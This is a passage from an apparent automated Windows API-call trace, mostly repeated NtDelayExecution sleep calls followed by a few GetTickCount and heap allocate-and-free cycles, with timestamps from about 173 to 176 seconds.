(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.115] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.125] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.146] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.149] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.169] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.216] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.504] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.517] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.608] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.670] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.685] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.701] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.732] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.973] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0173.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.039] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.050] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.051] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.155] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.173] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.219] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.255] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.688] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.751] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.803] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0174.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.060] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.078] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.155] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.225] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.261] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.277] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.340] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.678] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.694] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.709] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.794] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.824] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.858] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0175.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.109] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.134] GetTickCount () returned 0x204d1c9 [0176.134] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.134] GetTickCount () returned 0x204d1c9 [0176.134] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cea0 [0176.134] GetTickCount () returned 0x204d1c9 [0176.134] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cea0 | out: hHeap=0x2150000) returned 1 [0176.134] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.143] GetTickCount () returned 0x204da5f [0176.143] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.143] GetTickCount () returned 0x204da5f [0176.143] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cab0 [0176.143] GetTickCount () returned 0x204da5f [0176.143] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cab0 | out: hHeap=0x2150000) returned 1 [0176.143] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.180] GetTickCount () returned 0x204e324 [0176.180] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.180] GetTickCount () returned 0x204e324 [0176.180] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cab0 [0176.180] GetTickCount () returned 0x204e324 [0176.180] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cab0 | out: hHeap=0x2150000) returned 1 [0176.180] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.286] GetTickCount () returned 0x204ec17 [0176.286] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.286] GetTickCount () returned 0x204ec17 [0176.286] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cc90 [0176.286] GetTickCount () returned 0x204ec17 [0176.286] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cc90 | out: hHeap=0x2150000) returned 1 [0176.286] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.286] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.361] GetTickCount () returned 0x204f4fb [0176.362] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.362] GetTickCount () returned 0x204f4fb [0176.362] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.362] GetTickCount () returned 0x204f4fb [0176.362] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.362] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.415] GetTickCount () returned 0x204fdd0 [0176.415] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.415] GetTickCount () returned 0x204fdd0 [0176.415] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0176.415] GetTickCount () returned 0x204fdd0 [0176.415] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0176.415] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.468] GetTickCount () returned 0x2050695 [0176.468] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e412d0 [0176.468] GetTickCount () returned 0x2050695 [0176.469] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c3f0 [0176.469] GetTickCount () returned 0x2050695 [0176.469] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c3f0 | out: hHeap=0x2150000) returned 1 [0176.469] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412d0 | out: hHeap=0x2150000) returned 1 [0176.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0176.502] 